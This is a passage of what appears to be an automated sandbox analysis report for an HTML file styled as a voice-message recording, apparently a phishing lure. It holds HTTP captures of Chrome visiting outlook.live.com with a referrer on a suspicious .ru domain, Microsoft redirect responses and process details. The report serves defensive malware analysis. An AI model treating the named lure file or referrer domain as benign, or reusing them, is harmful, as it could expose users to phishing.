                                                                                                        2024-12-18 22:17:19 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2024-12-18 22:17:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.44979240.99.32.1144432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:20 UTC683OUTGET / HTTP/1.1
                                                                                                        Host: outlook.live.com
                                                                                                        Connection: keep-alive
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:21 UTC633INHTTP/1.1 302 Moved Temporarily
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Location: https://outlook.live.com/owa/
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        request-id: e95bc399-e9cf-126e-67b2-07ba983bfdf1
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        X-FEServer: DX0P273CA0007
                                                                                                        X-RequestId: a611df2d-6196-46cc-9d3c-12bd69742f77
                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                        X-FEProxyInfo: DX0P273CA0007.AREP273.PROD.OUTLOOK.COM
                                                                                                        X-FEEFZInfo: DXB
                                                                                                        MS-CV: mcNb6c/pbhJnsge6mDv98Q.0
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        X-FEServer: DX0P273CA0007
                                                                                                        Date: Wed, 18 Dec 2024 22:17:26 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.44979340.99.32.1144432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:17:23 UTC687OUTGET /owa/ HTTP/1.1
                                                                                                        Host: outlook.live.com
                                                                                                        Connection: keep-alive
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:17:24 UTC2864INHTTP/1.1 302
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Content-Length: 245
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Expires: -1
                                                                                                        Location: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        request-id: 8d7e0596-716f-7287-33cc-5ba3e8512acb
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        X-CalculatedBETarget: DX1P273MB1060.AREP273.PROD.OUTLOOK.COM
                                                                                                        X-BackEndHttpStatus: 302
                                                                                                        Set-Cookie: ClientId=B9657DC6F7BB40878B73CB1A04071DBE; expires=Thu, 18-Dec-2025 22:17:24 GMT; path=/;SameSite=None; secure
                                                                                                        Set-Cookie: ClientId=B9657DC6F7BB40878B73CB1A04071DBE; expires=Thu, 18-Dec-2025 22:17:24 GMT; path=/;SameSite=None; secure
                                                                                                        Set-Cookie: RoutingKeyCookie=; expires=Sun, 18-Dec-1994 22:17:24 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: HostSwitchPrg=; expires=Sun, 18-Dec-1994 22:17:24 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: OptInPrg=; expires=Sun, 18-Dec-1994 22:17:24 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: logonLatency=LGN01=638701570441290443; domain=live.com; path=/; secure; HttpOnly
                                                                                                        Set-Cookie: ClientId=B9657DC6F7BB40878B73CB1A04071DBE; expires=Thu, 18-Dec-2025 22:17:24 GMT; path=/;SameSite=None; secure
                                                                                                        Set-Cookie: RoutingKeyCookie=; expires=Sun, 18-Dec-1994 22:17:24 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: HostSwitchPrg=; expires=Sun, 18-Dec-1994 22:17:24 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: OptInPrg=; expires=Sun, 18-Dec-1994 22:17:24 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: logonLatency=LGN01=638701570441290443; domain=live.com; path=/; secure; HttpOnly
                                                                                                        Set-Cookie: X-OWA-RedirectHistory=AmVSIGQByyKjv7Ef3Qg; expires=Thu, 19-Dec-2024 04:19:24 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        X-RUM-Validated: 1
                                                                                                        X-RUM-NotUpdateQueriedPath: 1
                                                                                                        X-RUM-NotUpdateQueriedDbCopy: 1
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-BeSku: WCS7
                                                                                                        X-OWA-DiagnosticsInfo: 4;0;0;
                                                                                                        X-BackEnd-Begin: 2024-12-18T22:17:24.113
                                                                                                        X-BackEnd-End: 2024-12-18T22:17:24.129
                                                                                                        X-DiagInfo: DX1P273MB1060
                                                                                                        X-BEServer: DX1P273MB1060
                                                                                                        X-UA-Compatible: IE=EmulateIE7
                                                                                                        X-ResponseOrigin: OwaAppPool
                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                        Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=&FrontEnd=Cafe&DestinationEndpoint=DXB&RemoteIP=8.46.123.0&Environment=MT"}],"include_subdomains":true}
                                                                                                        NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                        X-Proxy-BackendServerStatus: 302
                                                                                                        X-FirstHopCafeEFZ: DXB
                                                                                                        X-FEProxyInfo: DX0P273CA0004.AREP273.PROD.OUTLOOK.COM
                                                                                                        X-FEEFZInfo: DXB
                                                                                                        X-FEServer: DX0P273CA0004
                                                                                                        Date: Wed, 18 Dec 2024 22:17:19 GMT
                                                                                                        Connection: close
                                                                                                        2024-12-18 22:17:24 UTC245INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 65 6e 2d 75 73 2f 6d 69 63 72 6f 73 6f 66 74 2d 33 36 35 2f 6f 75 74 6c 6f 6f 6b 2f 65 6d 61 69 6c 2d 61 6e 64 2d 63 61 6c 65 6e 64 61 72 2d 73 6f 66 74 77 61 72 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 6f 75 74 6c 6f 6f 6b 3f 64 65 65 70 6c 69 6e 6b 3d 25 32 66 6f 77 61 25 32 66 26 61 6d 70 3b 73 64 66 3d 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&amp;sdf=0">here</a>.</h2></body></html>


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:17:16:34
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\vRecord__0064secs__warriorsheart.com.html"
                                                                                                        Imagebase:0x7ff76e190000
                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:2
                                                                                                        Start time:17:16:37
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2540,i,15348211205700614738,394696290099158422,262144 /prefetch:8
                                                                                                        Imagebase:0x7ff76e190000
                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        No disassembly